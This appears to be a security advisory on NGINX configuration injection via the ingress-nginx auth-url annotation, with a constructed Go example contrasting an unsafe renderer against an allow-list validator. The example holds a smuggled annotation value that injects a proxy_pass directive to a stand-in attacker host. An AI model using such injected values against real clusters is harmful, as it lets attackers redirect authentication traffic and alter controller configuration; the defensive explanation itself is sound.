CVSS Score: -

Basic Information
CVE ID: -
GHSA ID: -
EPSS Score: -
CWE: -
Published: -
Updated: -
KEV Status: -
Technology: -
| Package Name | Ecosystem | Vulnerable Versions | First Patched Version |
|---|---|---|---|
| k8s.io/ingress-nginx | go | - | - |
The vulnerability stems from improper handling of the value of the `auth-url` annotation (`nginx.ingress.kubernetes.io/auth-url`). Two functions are involved. The first, `authURLAnnotationHandler.Handle`, parses the annotation but does not validate or sanitize its value. The second, `template.Writer.Write`, interpolates that untrusted value into the generated NGINX configuration without escaping. Because NGINX directives are terminated by `;` and grouped by `{ }`, a value that carries a `;` followed by newline-separated text is no longer a URL but additional configuration, so anyone who can create or modify an Ingress object in the cluster can inject arbitrary NGINX directives into the controller's configuration. Confidence in this attribution is high: the vulnerability description names the `auth-url` annotation as the injection vector, and the two functions match the CWE-15 (external control of configuration) and CWE-20 (improper input validation) patterns.
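The following is an added Go example, not code from the ingress-nginx project, illustrating the pattern the paragraph above describes: an unvalidated annotation value written verbatim into an NGINX configuration fragment, beside a hardened version that rejects any value which could terminate or restructure a directive. The rendering template, the validator, and the sample annotation values are all assumptions constructed for this example; the real controller's template and its fix are not reproduced here.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// AuthURLAnnotation is the annotation key the advisory refers to.
const AuthURLAnnotation = "nginx.ingress.kubernetes.io/auth-url"

// Constructed sample values (assumptions for this example, not real data).
// BenignValue is what an operator would normally set; MaliciousValue closes the
// proxy_pass directive with ';' and smuggles in a second directive on a new line.
const (
	BenignValue    = "https://auth.example.internal/check"
	MaliciousValue = "https://auth.example.internal/check;\n    proxy_pass http://attacker.example.com"
)

// RenderAuthBlockUnsafe mimics the vulnerable pattern: the annotation value is
// interpolated into the config fragment as-is, with no validation or escaping.
// This is a simplified stand-in for the real template, not the project's code.
func RenderAuthBlockUnsafe(authURL string) string {
	return fmt.Sprintf("location = /_external-auth {\n    proxy_pass %s;\n}\n", authURL)
}

// injectionChars matches bytes that can end an NGINX directive (whitespace, ';'),
// open or close a block ('{', '}'), start a comment ('#'), or delimit a quoted
// argument. None of them belongs in a URL used as a proxy_pass target.
var injectionChars = regexp.MustCompile(`[\s;{}#"']`)

// ValidateAuthURL accepts only an absolute http(s) URL free of injection
// characters and returns it unchanged, or an error describing the rejection.
func ValidateAuthURL(raw string) (string, error) {
	if injectionChars.MatchString(raw) {
		return "", errors.New("auth-url contains characters not permitted inside an NGINX directive")
	}
	u, err := url.Parse(raw)
	if err != nil {
		return "", fmt.Errorf("auth-url is not a valid URL: %w", err)
	}
	if (u.Scheme != "http" && u.Scheme != "https") || u.Host == "" {
		return "", errors.New("auth-url must be an absolute http or https URL")
	}
	return raw, nil
}

// RenderAuthBlockSafe is the hardened variant: validate first, template second.
func RenderAuthBlockSafe(authURL string) (string, error) {
	clean, err := ValidateAuthURL(authURL)
	if err != nil {
		return "", err
	}
	return RenderAuthBlockUnsafe(clean), nil
}

// ContainsInjectedDirective is a simple check over rendered output: the template
// intends exactly one directive (proxy_pass) inside the location block, so more
// than one ';'-terminated line means something extra was injected.
func ContainsInjectedDirective(rendered string) bool {
	count := 0
	for _, line := range strings.Split(rendered, "\n") {
		if strings.HasSuffix(strings.TrimSpace(line), ";") {
			count++
		}
	}
	return count > 1
}

func main() {
	for _, v := range []string{BenignValue, MaliciousValue} {
		unsafe := RenderAuthBlockUnsafe(v)
		fmt.Printf("unsafe render injected=%v:\n%s\n", ContainsInjectedDirective(unsafe), unsafe)
		if _, err := RenderAuthBlockSafe(v); err != nil {
			fmt.Printf("safe render rejected %q: %v\n\n", AuthURLAnnotation, err)
		} else {
			fmt.Printf("safe render accepted value\n\n")
		}
	}
}
```

The detection helper is deliberately crude (it counts directives rather than parsing NGINX syntax); the point it makes is that the untrusted value, not the template, decides how many directives end up in the block. An allow-list validator on the annotation, applied before templating, closes that path regardless of how the template is written.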